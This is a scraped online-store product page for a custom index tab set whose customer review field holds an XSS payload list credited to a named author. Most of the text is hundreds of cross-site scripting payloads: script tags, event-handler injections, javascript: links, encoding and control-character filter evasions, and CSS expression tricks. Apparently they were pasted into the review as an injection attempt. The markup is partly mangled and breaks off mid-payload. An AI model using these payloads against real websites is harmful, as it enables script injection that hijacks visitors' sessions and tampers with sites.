Index Tabs from The Tab Store
Top » Catalog » Custom Tabs
Design Online » SDT107 » Reviews		 Log In | My Account | Contact Us | Cart Contents | Checkout

Categories
Custom Tabs
Design Online
Blank Index Tabs->
Alpha & Other Index Tabs
Numbered Tabs
Roman Numerals
Chart Dividers->
A4 Size->
Add-Ons Designer
Special Items
Labels
On Sale Items

View Options
Entire Catalog

Quick Find
 
Use keywords to find the product you are looking for.
Advanced Search

Index Tab purchases are guarenteed

Information
About Us
Shipping & Returns
Privacy Notice
Conditions of Use
Contact Us

What's New? more
Appendix Tab
Appendix Tab
$58.27

Have a great idea?
Click Here to tell our team about it.
Many Thanks!

Powered by Authorize.Net
Design Your Own Index Tabs
7 Tabs per Set
[SDT107]		 $156.73
by Luke Dalske Date Added: Saturday 30 September, 2023
_!-- Project Name : Cross Site Scripting ( XSS ) Vulnerability Payload List --_
_!-- Author : Ismail Tasdelen --_
_!-- Linkedin : https://www.linkedin.com/in/ismailtasdelen/ --_
_!-- GitHub : https://github.com/ismailtasdelen/ --_
_!-- Twitter : https://twitter.com/ismailtsdln --_
_!-- Medium : https://medium.com/@ismailtasdelen --_

"-prompt(8)-"
'-prompt(8)-'
";a=prompt,a()//
';a=prompt,a()//
'-eval("window['pro'%2B'mpt'](8)")-'
"-eval("window['pro'%2B'mpt'](8)")-"-

"onclick=prompt(8)_"@x.y
"onclick=prompt(8)__svg/onload=prompt(8)_"@x.y-

_image/src/onerror=prompt(8)_
_img/src/onerror=prompt(8)_
_image src/onerror=prompt(8)_
_img src/onerror=prompt(8)_
_image src =q onerror=prompt(8)_
_img src =q onerror=prompt(8)_
_/scrip_/script_t__img src =q onerror=prompt(8)_
_script\x20type="text/javascript"_javascript:a-
lert(1);_/script_
_script\x3Etype="text/javascript"_javascript:a-
lert(1);_/script_
_script\x0Dtype="text/javascript"_javascript:a-
lert(1);_/script_
_script\x09type="text/javascript"_javascript:a-
lert(1);_/script_
_script\x0Ctype="text/javascript"_javascript:a-
lert(1);_/script_
_script\x2Ftype="text/javascript"_javascript:a-
lert(1);_/script_
_script\x0Atype="text/javascript"_javascript:a-
lert(1);_/script_
'`"__\x3Cscript_javascript:alert(1)_/script_
'`"__\x00script_javascript:alert(1)_/script_
_img src=1 href=1 onerror="javascript:alert(1)"__/img_
_audio src=1 href=1 onerror="javascript:alert(1)"__/audio_
_video src=1 href=1 onerror="javascript:alert(1)"__/video_
_body src=1 href=1 onerror="javascript:alert(1)"__/body_
_image src=1 href=1 onerror="javascript:alert(1)"__/image_
_object src=1 href=1 onerror="javascript:alert(1)"__/object_
_script src=1 href=1 onerror="javascript:alert(1)"__/script_
_svg onResize svg onResize="javascript:javascript:alert(1)"__/svg onResize_
_title onPropertyChange title onPropertyChange="javascript:javascript:alert(1)"_-
_/title onPropertyChange_
_iframe onLoad iframe onLoad="javascript:javascript:alert(1)"__/iframe onLoad_
_body onMouseEnter body onMouseEnter="javascript:javascript:alert(1)"__/bo-
dy onMouseEnter_
_body onFocus body onFocus="javascript:javascript:alert(1)"__/body onFocus_
_frameset onScroll frameset onScroll="javascript:javascript:alert(1)"__/frames-
et onScroll_
_script onReadyStateChange script onReadyStateChange="javascript:javascript:alert(1)"-
;__/script onReadyStateChange_
_html onMouseUp html onMouseUp="javascript:javascript:alert(1)"__/html onMouseUp_
_body onPropertyChange body onPropertyChange="javascript:javascript:alert(1)"_-
_/body onPropertyChange_
_svg onLoad svg onLoad="javascript:javascript:alert(1)"__/svg onLoad_
_body onPageHide body onPageHide="javascript:javascript:alert(1)"__/body onPageHide_
_body onMouseOver body onMouseOver="javascript:javascript:alert(1)"__/bod-
y onMouseOver_
_body onUnload body onUnload="javascript:javascript:alert(1)"__/body onUnload_
_body onLoad body onLoad="javascript:javascript:alert(1)"__/body onLoad_
_bgsound onPropertyChange bgsound onPropertyChange="javascript:javascript:alert(1)"_-
_/bgsound onPropertyChange_
_html onMouseLeave html onMouseLeave="javascript:javascript:alert(1)"__/ht-
ml onMouseLeave_
_html onMouseWheel html onMouseWheel="javascript:javascript:alert(1)"__/ht-
ml onMouseWheel_
_style onLoad style onLoad="javascript:javascript:alert(1)"__/style onLoad_
_iframe onReadyStateChange iframe onReadyStateChange="javascript:javascript:alert(1)"-
;__/iframe onReadyStateChange_
_body onPageShow body onPageShow="javascript:javascript:alert(1)"__/body onPageShow_
_style onReadyStateChange style onReadyStateChange="javascript:javascript:alert(1)"-
;__/style onReadyStateChange_
_frameset onFocus frameset onFocus="javascript:javascript:alert(1)"__/framese-
t onFocus_
_applet onError applet onError="javascript:javascript:alert(1)"__/applet onError_
_marquee onStart marquee onStart="javascript:javascript:alert(1)"__/marquee onStart_
_script onLoad script onLoad="javascript:javascript:alert(1)"__/script onLoad_
_html onMouseOver html onMouseOver="javascript:javascript:alert(1)"__/htm-
l onMouseOver_
_html onMouseEnter html onMouseEnter="javascript:parent.javascript:alert(1)&quo-
t;__/html onMouseEnter_
_body onBeforeUnload body onBeforeUnload="javascript:javascript:alert(1)"__/-
body onBeforeUnload_
_html onMouseDown html onMouseDown="javascript:javascript:alert(1)"__/htm-
l onMouseDown_
_marquee onScroll marquee onScroll="javascript:javascript:alert(1)"__/marque-
e onScroll_
_xml onPropertyChange xml onPropertyChange="javascript:javascript:alert(1)"_-
_/xml onPropertyChange_
_frameset onBlur frameset onBlur="javascript:javascript:alert(1)"__/frameset onBlur_
_applet onReadyStateChange applet onReadyStateChange="javascript:javascript:alert(1)"-
;__/applet onReadyStateChange_
_svg onUnload svg onUnload="javascript:javascript:alert(1)"__/svg onUnload_
_html onMouseOut html onMouseOut="javascript:javascript:alert(1)"__/html onMouseOut_
_body onMouseMove body onMouseMove="javascript:javascript:alert(1)"__/bod-
y onMouseMove_
_body onResize body onResize="javascript:javascript:alert(1)"__/body onResize_
_object onError object onError="javascript:javascript:alert(1)"__/object onError_
_body onPopState body onPopState="javascript:javascript:alert(1)"__/body onPopState_
_html onMouseMove html onMouseMove="javascript:javascript:alert(1)"__/htm-
l onMouseMove_
_applet onreadystatechange applet onreadystatechange="javascript:javascript:alert(1)"-
;__/applet onreadystatechange_
_body onpagehide body onpagehide="javascript:javascript:alert(1)"__/body onpagehide_
_svg onunload svg onunload="javascript:javascript:alert(1)"__/svg onunload_
_applet onerror applet onerror="javascript:javascript:alert(1)"__/applet onerror_
_body onkeyup body onkeyup="javascript:javascript:alert(1)"__/body onkeyup_
_body onunload body onunload="javascript:javascript:alert(1)"__/body onunload_
_iframe onload iframe onload="javascript:javascript:alert(1)"__/iframe onload_
_body onload body onload="javascript:javascript:alert(1)"__/body onload_
_html onmouseover html onmouseover="javascript:javascript:alert(1)"__/htm-
l onmouseover_
_object onbeforeload object onbeforeload="javascript:javascript:alert(1)"__/ob-
ject onbeforeload_
_body onbeforeunload body onbeforeunload="javascript:javascript:alert(1)"__/-
body onbeforeunload_
_body onfocus body onfocus="javascript:javascript:alert(1)"__/body onfocus_
_body onkeydown body onkeydown="javascript:javascript:alert(1)"__/body onkeydown_
_iframe onbeforeload iframe onbeforeload="javascript:javascript:alert(1)"__/if-
rame onbeforeload_
_iframe src iframe src="javascript:javascript:alert(1)"__/iframe src_
_svg onload svg onload="javascript:javascript:alert(1)"__/svg onload_
_html onmousemove html onmousemove="javascript:javascript:alert(1)"__/htm-
l onmousemove_
_body onblur body onblur="javascript:javascript:alert(1)"__/body onblur_
\x3Cscript_javascript:alert(1)_/script_
'"`__script_/* *\x2Fjavascript:alert(1)// */_/script_
_script_javascript:alert(1)_/script\x0D
_script_javascript:alert(1)_/script\x0A
_script_javascript:alert(1)_/script\x0B
_script charset="\x22_javascript:alert(1)_/script_
_!--\x3E_img src=xxx:x onerror=javascript:alert(1)_ --_
--__!-- ---_ _img src=xxx:x onerror=javascript:alert(1)_ --_
--__!-- --\x00_ _img src=xxx:x onerror=javascript:alert(1)_ --_
--__!-- --\x21_ _img src=xxx:x onerror=javascript:alert(1)_ --_
--__!-- --\x3E_ _img src=xxx:x onerror=javascript:alert(1)_ --_
`"'__img src='#\x27 onerror=javascript:alert(1)_
_a href="javascript\x3Ajavascript:alert(1)" id="fuzzelement1"_test_/a_
"'`__p__svg__script_a='hello\x27;javascript:alert(1-
)//';_/script__/p_
_a href="javas\x00cript:javascript:alert(1)" id="fuzzelement1"_test_/a_
_a href="javas\x07cript:javascript:alert(1)" id="fuzzelement1"_test_/a_
_a href="javas\x0Dcript:javascript:alert(1)" id="fuzzelement1"_test_/a_
_a href="javas\x0Acript:javascript:alert(1)" id="fuzzelement1"_test_/a_
_a href="javas\x08cript:javascript:alert(1)" id="fuzzelement1"_test_/a_
_a href="javas\x02cript:javascript:alert(1)" id="fuzzelement1"_test_/a_
_a href="javas\x03cript:javascript:alert(1)" id="fuzzelement1"_test_/a_
_a href="javas\x04cript:javascript:alert(1)" id="fuzzelement1"_test_/a_
_a href="javas\x01cript:javascript:alert(1)" id="fuzzelement1"_test_/a_
_a href="javas\x05cript:javascript:alert(1)" id="fuzzelement1"_test_/a_
_a href="javas\x0Bcript:javascript:alert(1)" id="fuzzelement1"_test_/a_
_a href="javas\x09cript:javascript:alert(1)" id="fuzzelement1"_test_/a_
_a href="javas\x06cript:javascript:alert(1)" id="fuzzelement1"_test_/a_
_a href="javas\x0Ccript:javascript:alert(1)" id="fuzzelement1"_test_/a_
_script_/* *\x2A/javascript:alert(1)// */_/script_
_script_/* *\x00/javascript:alert(1)// */_/script_
_style__/style\x3E_img src="about:blank" onerror=javascript:alert(1)//__/style_
_style__/style\x0D_img src="about:blank" onerror=javascript:alert(1)//__/style_
_style__/style\x09_img src="about:blank" onerror=javascript:alert(1)//__/style_
_style__/style\x20_img src="about:blank" onerror=javascript:alert(1)//__/style_
_style__/style\x0A_img src="about:blank" onerror=javascript:alert(1)//__/style_
"'`_ABC_div style="font-family:'foo'\x7Dx:expression(javascript:ale-
rt(1);/*';"_DEF
"'`_ABC_div style="font-family:'foo'\x3Bx:expression(javascript:ale-
rt(1);/*';"_DEF
%253Cscript%253Ealert('XSS')%253C%252Fscript%253E
_script_if("x\\xE1\x96\x89".length==2) { javascript:alert(1);}_/script_
_script_if("x\\xE0\xB9\x92".length==2) { javascript:alert(1);}_/script_
_script_if("x\\xEE\xA9\x93".length==2) { javascript:alert(1);}_/script_
'`"__\x3Cscript_javascript:alert(1)_/script_
'`"__\x00script_javascript:alert(1)_/script_
"'`__\x3Cimg src=xxx:x onerror=javascript:alert(1)_
"'`__\x00img src=xxx:x onerror=javascript:alert(1)_
_script src="data:text/plain\x2Cjavascript:alert(1)"__/scr-
ipt_
_script src="data:\xD4\x8F,javascript:alert(1)"__/script_<-
br /> _script src="data:\xE0\xA4\x98,javascript:alert(1)"__/scri-
pt_
_script src="data:\xCB\x8F,javascript:alert(1)"__/script_<-
br /> _script\x20type="text/javascript"_javascript:a-
lert(1);_/script_
_script\x3Etype="text/javascript"_javascript:a-
lert(1);_/script_
_script\x0Dtype="text/javascript"_javascript:a-
lert(1);_/script_
_script\x09type="text/javascript"_javascript:a-
lert(1);_/script_
_script\x0Ctype="text/javascript"_javascript:a-
lert(1);_/script_
_script\x2Ftype="text/javascript"_javascript:a-
lert(1);_/script_
_script\x0Atype="text/javascript"_javascript:a-
lert(1);_/script_
ABC_div style="x\x3Aexpression(javascript:alert(1)"_DEF
ABC_div style="x:expression\x5C(javascript:alert(1)"_DEFr /> ABC_div style="x:expression\x00(javascript:alert(1)"_DEFr /> ABC_div style="x:exp\x00ression(javascript:alert(1)"_DEFr /> ABC_div style="x:exp\x5Cression(javascript:alert(1)"_DEFr /> ABC_div style="x:\x0Aexpression(javascript:alert(1)"_DEFr /> ABC_div style="x:\x09expression(javascript:alert(1)"_DEFr /> ABC_div style="x:\xE3\x80\x80expression(javascript:alert(1)&quo-
t;_DEF
ABC_div style="x:\xE2\x80\x84expression(javascript:alert(1)&quo-
t;_DEF
ABC_div style="x:\xC2\xA0expression(javascript:alert(1)"_D-
EF
ABC_div style="x:\xE2\x80\x80expression(javascript:alert(1)&quo-
t;_DEF
ABC_div style="x:\xE2\x80\x8Aexpression(javascript:alert(1)&quo-
t;_DEF
ABC_div style="x:\x0Dexpression(javascript:alert(1)"_DEFr /> ABC_div style="x:\x0Cexpression(javascript:alert(1)"_DEFr /> ABC_div style="x:\xE2\x80\x87expression(javascript:alert(1)&quo-
t;_DEF
ABC_div style="x:\xEF\xBB\xBFexpression(javascript:alert(1)&quo-
t;_DEF
ABC_div style="x:\x20expression(javascript:alert(1)"_DEFr /> ABC_div style="x:\xE2\x80\x88expression(javascript:alert(1)&quo-
t;_DEF
ABC_div style="x:\x00expression(javascript:alert(1)"_DEFr /> ABC_div style="x:\xE2\x80\x8Bexpression(javascript:alert(1)&quo-
t;_DEF
ABC_div style="x:\xE2\x80\x86expression(javascript:alert(1)&quo-
t;_DEF
ABC_div style="x:\xE2\x80\x85expression(javascript:alert(1)&quo-
t;_DEF
ABC_div style="x:\xE2\x80\x82expression(javascript:alert(1)&quo-
t;_DEF
ABC_div style="x:\x0Bexpression(javascript:alert(1)"_DEFr /> ABC_div style="x:\xE2\x80\x81expression(javascript:alert(1)&quo-
t;_DEF
ABC_div style="x:\xE2\x80\x83expression(javascript:alert(1)&quo-
t;_DEF
ABC_div style="x:\xE2\x80\x89expression(javascript:alert(1)&quo-
t;_DEF
_a href="\x0Bjavascript:javascript:alert(1)" id="fuzzelement1"_test_/a_
_a href="\x0Fjavascript:javascript:alert(1)" id="fuzzelement1"_test_/a_
_a href="\xC2\xA0javascript:javascript:alert(1)" id="fuzzelement1"_test_/a_
_a href="\x05javascript:javascript:alert(1)" id="fuzzelement1"_test_/a_
_a href="\xE1\xA0\x8Ejavascript:javascript:alert(1)" id="fuzzelement1"_test_/a_
_a href="\x18javascript:javascript:alert(1)" id="fuzzelement1"_test_/a_
_a href="\x11javascript:javascript:alert(1)" id="fuzzelement1"_test_/a_
_a href="\xE2\x80\x88javascript:javascript:alert(1)" id="fuzzelement1"_test_/a_
_a href="\xE2\x80\x89javascript:javascript:alert(1)" id="fuzzelement1"_test_/a_
_a href="\xE2\x80\x80javascript:javascript:alert(1)" id="fuzzelement1"_test_/a_
_a href="\x17javascript:javascript:alert(1)" id="fuzzelement1"_test_/a_
_a href="\x03javascript:javascript:alert(1)" id="fuzzelement1"_test_/a_
_a href="\x0Ejavascript:javascript:alert(1)" id="fuzzelement1"_test_/a_
_a href="\x1Ajavascript:javascript:alert(1)" id="fuzzelement1"_test_/a_
_a href="\x00javascript:javascript:alert(1)" id="fuzzelement1"_test_/a_
_a href="\x10javascript:javascript:alert(1)" id="fuzzelement1"_test_/a_
_a href="\xE2\x80\x82javascript:javascript:alert(1)" id="fuzzelement1"_test_/a_
_a href="\x20javascript:javascript:alert(1)" id="fuzzelement1"_test_/a_
_a href="\x13javascript:javascript:alert(1)" id="fuzzelement1"_test_/a_
_a href="\x09javascript:javascript:alert(1)" id="fuzzelement1"_test_/a_
_a href="\xE2\x80\x8Ajavascript:javascript:alert(1)" id="fuzzelement1"_test_/a_
_a href="\x14javascript:javascript:alert(1)" id="fuzzelement1"_test_/a_
_a href="\x19javascript:javascript:alert(1)" id="fuzzelement1"_test_/a_
_a href="\xE2\x80\xAFjavascript:javascript:alert(1)" id="fuzzelement1"_test_/a_
_a href="\x1Fjavascript:javascript:alert(1)" id="fuzzelement1"_test_/a_
_a href="\xE2\x80\x81javascript:javascript:alert(1)" id="fuzzelement1"_test_/a_
_a href="\x1Djavascript:javascript:alert(1)" id="fuzzelement1"_test_/a_
_a href="\xE2\x80\x87javascript:javascript:alert(1)" id="fuzzelement1"_test_/a_
_a href="\x07javascript:javascript:alert(1)" id="fuzzelement1"_test_/a_
_a href="\xE1\x9A\x80javascript:javascript:alert(1)" id="fuzzelement1"_test_/a_
_a href="\xE2\x80\x83javascript:javascript:alert(1)" id="fuzzelement1"_test_/a_
_a href="\x04javascript:javascript:alert(1)" id="fuzzelement1"_test_/a_
_a href="\x01javascript:javascript:alert(1)" id="fuzzelement1"_test_/a_
_a href="\x08javascript:javascript:alert(1)" id="fuzzelement1"_test_/a_
_a href="\xE2\x80\x84javascript:javascript:alert(1)" id="fuzzelement1"_test_/a_
_a href="\xE2\x80\x86javascript:javascript:alert(1)" id="fuzzelement1"_test_/a_
_a href="\xE3\x80\x80javascript:javascript:alert(1)" id="fuzzelement1"_test_/a_
_a href="\x12javascript:javascript:alert(1)" id="fuzzelement1"_test_/a_
_a href="\x0Djavascript:javascript:alert(1)" id="fuzzelement1"_test_/a_
_a href="\x0Ajavascript:javascript:alert(1)" id="fuzzelement1"_test_/a_
_a href="\x0Cjavascript:javascript:alert(1)" id="fuzzelement1"_test_/a_
_a href="\x15javascript:javascript:alert(1)" id="fuzzelement1"_test_/a_
_a href="\xE2\x80\xA8javascript:javascript:alert(1)" id="fuzzelement1"_test_/a_
_a href="\x16javascript:javascript:alert(1)" id="fuzzelement1"_test_/a_
_a href="\x02javascript:javascript:alert(1)" id="fuzzelement1"_test_/a_
_a href="\x1Bjavascript:javascript:alert(1)" id="fuzzelement1"_test_/a_
_a href="\x06javascript:javascript:alert(1)" id="fuzzelement1"_test_/a_
_a href="\xE2\x80\xA9javascript:javascript:alert(1)" id="fuzzelement1"_test_/a_
_a href="\xE2\x80\x85javascript:javascript:alert(1)" id="fuzzelement1"_test_/a_
_a href="\x1Ejavascript:javascript:alert(1)" id="fuzzelement1"_test_/a_
_a href="\xE2\x81\x9Fjavascript:javascript:alert(1)" id="fuzzelement1"_test_/a_
_a href="\x1Cjavascript:javascript:alert(1)" id="fuzzelement1"_test_/a_
_a href="javascript\x00:javascript:alert(1)" id="fuzzelement1"_test_/a_
_a href="javascript\x3A:javascript:alert(1)" id="fuzzelement1"_test_/a_
_a href="javascript\x09:javascript:alert(1)" id="fuzzelement1"_test_/a_
_a href="javascript\x0D:javascript:alert(1)" id="fuzzelement1"_test_/a_
_a href="javascript\x0A:javascript:alert(1)" id="fuzzelement1"_test_/a_
`"'__img src=xxx:x \x0Aonerror=javascript:alert(1)_
`"'__img src=xxx:x \x22onerror=javascript:alert(1)_
`"'__img src=xxx:x \x0Bonerror=javascript:alert(1)_
`"'__img src=xxx:x \x0Donerror=javascript:alert(1)_
`"'__img src=xxx:x \x2Fonerror=javascript:alert(1)_
`"'__img src=xxx:x \x09onerror=javascript:alert(1)_
`"'__img src=xxx:x \x0Conerror=javascript:alert(1)_
`"'__img src=xxx:x \x00onerror=javascript:alert(1)_
`"'__img src=xxx:x \x27onerror=javascript:alert(1)_
`"'__img src=xxx:x \x20onerror=javascript:alert(1)_
"`'__script_\x3Bjavascript:alert(1)_/script_
"`'__script_\x0Djavascript:alert(1)_/script_
"`'__script_\xEF\xBB\xBFjavascript:alert(1)_/script-
_
"`'__script_\xE2\x80\x81javascript:alert(1)_/script-
_
"`'__script_\xE2\x80\x84javascript:alert(1)_/script-
_
"`'__script_\xE3\x80\x80javascript:alert(1)_/script-
_
"`'__script_\x09javascript:alert(1)_/script_
"`'__script_\xE2\x80\x89javascript:alert(1)_/script-
_
"`'__script_\xE2\x80\x85javascript:alert(1)_/script-
_
"`'__script_\xE2\x80\x88javascript:alert(1)_/script-
_
"`'__script_\x00javascript:alert(1)_/script_
"`'__script_\xE2\x80\xA8javascript:alert(1)_/script-
_
"`'__script_\xE2\x80\x8Ajavascript:alert(1)_/script-
_
"`'__script_\xE1\x9A\x80javascript:alert(1)_/script-
_
"`'__script_\x0Cjavascript:alert(1)_/script_
"`'__script_\x2Bjavascript:alert(1)_/script_
"`'__script_\xF0\x90\x96\x9Ajavascript:alert(1)_/sc-
ript_
"`'__script_-javascript:alert(1)_/script_
"`'__script_\x0Ajavascript:alert(1)_/script_
"`'__script_\xE2\x80\xAFjavascript:alert(1)_/script-
_
"`'__script_\x7Ejavascript:alert(1)_/script_
"`'__script_\xE2\x80\x87javascript:alert(1)_/script-
_
"`'__script_\xE2\x81\x9Fjavascript:alert(1)_/script-
_
"`'__script_\xE2\x80\xA9javascript:alert(1)_/script-
_
"`'__script_\xC2\x85javascript:alert(1)_/script_
"`'__script_\xEF\xBF\xAEjavascript:alert(1)_/script-
_
"`'__script_\xE2\x80\x83javascript:alert(1)_/script-
_
"`'__script_\xE2\x80\x8Bjavascript:alert(1)_/script-
_
"`'__script_\xEF\xBF\xBEjavascript:alert(1)_/script-
_
"`'__script_\xE2\x80\x80javascript:alert(1)_/script-
_
"`'__script_\x21javascript:alert(1)_/script_
"`'__script_\xE2\x80\x82javascript:alert(1)_/script-
_
"`'__script_\xE2\x80\x86javascript:alert(1)_/script-
_
"`'__script_\xE1\xA0\x8Ejavascript:alert(1)_/script-
_
"`'__script_\x0Bjavascript:alert(1)_/script_
"`'__script_\x20javascript:alert(1)_/script_
"`'__script_\xC2\xA0javascript:alert(1)_/script_
"/__img/onerror=\x0Bjavascript:alert(1)\x0Bsrc=xxx:-
x /_
"/__img/onerror=\x22javascript:alert(1)\x22src=xxx:-
x /_
"/__img/onerror=\x09javascript:alert(1)\x09src=xxx:-
x /_
"/__img/onerror=\x27javascript:alert(1)\x27src=xxx:-
x /_
"/__img/onerror=\x0Ajavascript:alert(1)\x0Asrc=xxx:-
x /_
"/__img/onerror=\x0Cjavascript:alert(1)\x0Csrc=xxx:-
x /_
"/__img/onerror=\x0Djavascript:alert(1)\x0Dsrc=xxx:-
x /_
"/__img/onerror=\x60javascript:alert(1)\x60src=xxx:-
x /_
"/__img/onerror=\x20javascript:alert(1)\x20src=xxx:-
x /_
_script\x2F_javascript:alert(1)_/script_
_script\x20_javascript:alert(1)_/script_
_script\x0D_javascript:alert(1)_/script_
_script\x0A_javascript:alert(1)_/script_
_script\x0C_javascript:alert(1)_/script_
_script\x00_javascript:alert(1)_/script_
_script\x09_javascript:alert(1)_/script_
`"'__img src=xxx:x onerror\x0B=javascript:alert(1)_
`"'__img src=xxx:x onerror\x00=javascript:alert(1)_
`"'__img src=xxx:x onerror\x0C=javascript:alert(1)_
`"'__img src=xxx:x onerror\x0D=javascript:alert(1)_
`"'__img src=xxx:x onerror\x20=javascript:alert(1)_
`"'__img src=xxx:x onerror\x0A=javascript:alert(1)_
`"'__img src=xxx:x onerror\x09=javascript:alert(1)_
_script_javascript:alert(1)_\x00/script_
_img src=# onerror\x3D"javascript:alert(1)" _
_input onfocus=javascript:alert(1) autofocus_
_input onblur=javascript:alert(1) autofocus__input autofocus_
_video poster=javascript:javascript:alert(1)//
_body onscroll=javascript:alert(1)__br__br__br__br__br__br_..._br_-
_br__br__br__br__br__br__br__br__br_..._br__br__br__br__br__-
br__br__br__br__br_..._br__br__br__br__br__br__br__br__br__b-
r_..._br__br__br__br__br__br__br__br__br__br_..._br__br__br_-
_br__input autofocus_
_form id=test onforminput=javascript:alert(1)__input__/form__button form=test onformchange=javascript:alert(1)_X
_video__source onerror="javascript:javascript:alert(1)"_
_video onerror="javascript:javascript:alert(1)"__source_<-
br /> _form__button formaction="javascript:javascript:alert(1)"_X
_body oninput=javascript:alert(1)__input autofocus_
_math href="javascript:javascript:alert(1)"_CLICKME_/mat-
h_ _math_ _maction actiontype="statusline#http://google.com" xlink:href="javascript:javascript:alert(1)"_CLICKM-
E_/maction_ _/math_
_frameset onload=javascript:alert(1)_
_table background="javascript:javascript:alert(1)"_
_!--_img src="--__img src=x onerror=javascript:alert(1)//"_
_comment__img src="_/comment__img src=x onerror=javascript:alert(1))//"_
_![__img src="]__img src=x onerror=javascript:alert(1)//"_
_style__img src="_/style__img src=x onerror=javascript:alert(1)//"_
_li style=list-style:url() onerror=javascript:alert(1)_ _div style=content:url(data:image/svg+xml,%%3Csvg/%%3E);visibilit-
y:hidden onload=javascript:alert(1)__/div_
_head__base href="javascript://"__/head__body__a href="/. /,javascript:alert(1)//#"_XXX_/a__/body_
_SCRIPT FOR=document EVENT=onreadystatechange_javascript:alert(1)_/SCRIPT_
_OBJECT CLASSID="clsid:333C7BC4-460F-11D0-BC04-0080C7055A83&quo-
t;__PARAM NAME="DataURL" VALUE="javascript:alert(1)"__/OBJECT_
_object data="data:text/html;base64,%(base64)s"_
_embed src="data:text/html;base64,%(base64)s"_
_b _script_alert(1)_/script_0
_div id="div1"__input value="``onmouseover=javascript:alert(1)"__/div_ _div id="div2"__/div__script_document.getElementById(&q-
uot;div2").innerHTML = document.getElementById("div1").innerHTML;_/script-
_
_x '="foo"__x foo='__img src=x onerror=javascript:alert(1)//'_
_embed src="javascript:alert(1)"_
_img src="javascript:alert(1)"_
_image src="javascript:alert(1)"_
_script src="javascript:alert(1)"_
_div style=width:1px;filter:glow onfilterchange=javascript:alert(1)_x
_? foo="__script_javascript:alert(1)_/script_"_
_! foo="__script_javascript:alert(1)_/script_"_
_/ foo="__script_javascript:alert(1)_/script_"_
_? foo="__x foo='?__script_javascript:alert(1)_/script_'_"_
_! foo="[[[Inception]]"__x foo="]foo__script_javascript:alert(1)_/script_"_r /> _% foo__x foo="%__script_javascript:alert(1)_/script_"_
_div id=d__x xmlns="__iframe onload=javascript:alert(1)"__/div_ _script_d.innerHTML=d.innerHTML_/script_
_img \x00src=x onerror="alert(1)"_
_img \x47src=x onerror="javascript:alert(1)"_
_img \x11src=x onerror="javascript:alert(1)"_
_img \x12src=x onerror="javascript:alert(1)"_
_img\x47src=x onerror="javascript:alert(1)"_
_img\x10src=x onerror="javascript:alert(1)"_
_img\x13src=x onerror="javascript:alert(1)"_
_img\x32src=x onerror="javascript:alert(1)"_
_img\x47src=x onerror="javascript:alert(1)"_
_img\x11src=x onerror="javascript:alert(1)"_
_img \x47src=x onerror="javascript:alert(1)"_
_img \x34src=x onerror="javascript:alert(1)"_
_img \x39src=x onerror="javascript:alert(1)"_
_img \x00src=x onerror="javascript:alert(1)"_
_img src\x09=x onerror="javascript:alert(1)"_
_img src\x10=x onerror="javascript:alert(1)"_
_img src\x13=x onerror="javascript:alert(1)"_
_img src\x32=x onerror="javascript:alert(1)"_
_img src\x12=x onerror="javascript:alert(1)"_
_img src\x11=x onerror="javascript:alert(1)"_
_img src\x00=x onerror="javascript:alert(1)"_
_img src\x47=x onerror="javascript:alert(1)"_
_img src=x\x09onerror="javascript:alert(1)"_
_img src=x\x10onerror="javascript:alert(1)"_
_img src=x\x11onerror="javascript:alert(1)"_
_img src=x\x12onerror="javascript:alert(1)"_
_img src=x\x13onerror="javascript:alert(1)"_
_img[a][b][c]src[d]=x[e]onerror=[f]"alert(1)"_-

_img src=x onerror=\x09"javascript:alert(1)"_
_img src=x onerror=\x10"javascript:alert(1)"_
_img src=x onerror=\x11"javascript:alert(1)"_
_img src=x onerror=\x12"javascript:alert(1)"_
_img src=x onerror=\x32"javascript:alert(1)"_
_img src=x onerror=\x00"javascript:alert(1)"_
_a href=java&#1&#2&#3&#4&#5&#6&#7&a-
mp;#8&#11&#12script:javascript:alert(1)_XXX_/a_
_img src="x` `_script_javascript:alert(1)_/script_"` `_
_img src onerror /" '"= alt=javascript:alert(1)//"_
_title onpropertychange=javascript:alert(1)__/title__title title=_
_a href=http://foo.bar/#x=`y__/a__img alt="`__img src=x:x onerror=javascript:alert(1)__/a_"_
_!--[if]__script_javascript:alert(1)_/script --_
_!--[if_img src=x onerror=javascript:alert(1)//]_ --_
_script src="/\%(jscript)s"__/script_
_script src="\\%(jscript)s"__/script_
_object id="x" classid="clsid:CB927D12-4FF7-4a9e-A169-56E4B8A75598&quo-
t;__/object_ _object classid="clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B&quo-
t; onqt_error="javascript:alert(1)" style="behavior:url(#x);"__param name=postdomevents /__/object_
_a style="-o-link:'javascript:javascript:alert(1)';-o-link-
-source:current"_X
_style_p[foo=bar{}*{-o-link:'javascript:javascript:alert-
(1)'}{}*{-o-link-source:current}]{color:red};_/style_
_link rel=stylesheet href=data:,*%7bx:expression(javascript:alert(1))%7d
_style_@import "data:,*%7bx:expression(javascript:alert(1))%7D";_-
/style_
_a style="pointer-events:none;position:absolute;"__a style="position:absolute;" onclick="javascript:alert(1);"_XXX_/a__/a__a href="javascript:javascript:alert(1)"_XXX_/a_
_style_*[{}@import'%(css)s?]_/style_X
_div style="font-family:'foo&#10;;color:red;';"_XXX-

_div style="font-family:foo}color=red;"_XXX
_// style=x:expression\28javascript:alert(1)\29_
_style_*{x:&#65349;&#65368;&#65360;&#653-
62;&#65349;&#65363;&#65363;&#65353;&#653-
59;&#65358;(javascript:alert(1))}_/style_
_div style=content:url(%(svg)s)__/div_
_div style="list-style:url(http://foo.f)\20url(javascript:ja-
vascript:alert(1));"_X
_div id=d__div style="font-family:'sans\27\3B color\3Ared\3B'"_X_/div__/div_ _script_with(document.getElementById("d"))innerHTM-
L=innerHTML_/script_
_div style="background:url(/f#&#127;oo/;color:red/*/foo.-
jpg);"_X
_div style="font-family:foo{bar;background:url(http://foo.f/-
oo};color:red/*/foo.jpg);"_X
_div id="x"_XXX_/div_ _style_ #x{font-family:foo[bar;color:green;} #y];color:red;{} _/style_
_x style="background:url('x&#1;;color:red;/*')"_X-
XX_/x_
_script_({set/**/$($){_/**/setter=$,_=javascript:alert(1-
)}}).$=eval_/script_
_script_({0:#0=eval/#0#/#0#(javascript:alert(1))})_/scri-
pt_
_script_ReferenceError.prototype.__defineGetter__('name'-
, function(){javascript:alert(1)}),x_/script_
_script_Object.__noSuchMethod__ = Function,[{}][0].constructor._('javascript:alert(1)')()_/scr-
ipt_
_meta charset="x-imap4-modified-utf7"_&ADz&AGn&a-
mp;AG0&AEf&ACA&AHM&AHI&AGO&AD0&A-
Gn&ACA&AG8Abg&AGUAcgByAG8AcgA9AGEAbABlAHIAdAAoAD-
EAKQ&ACAAPABi
_meta charset="x-imap4-modified-utf7"_&_script&S-
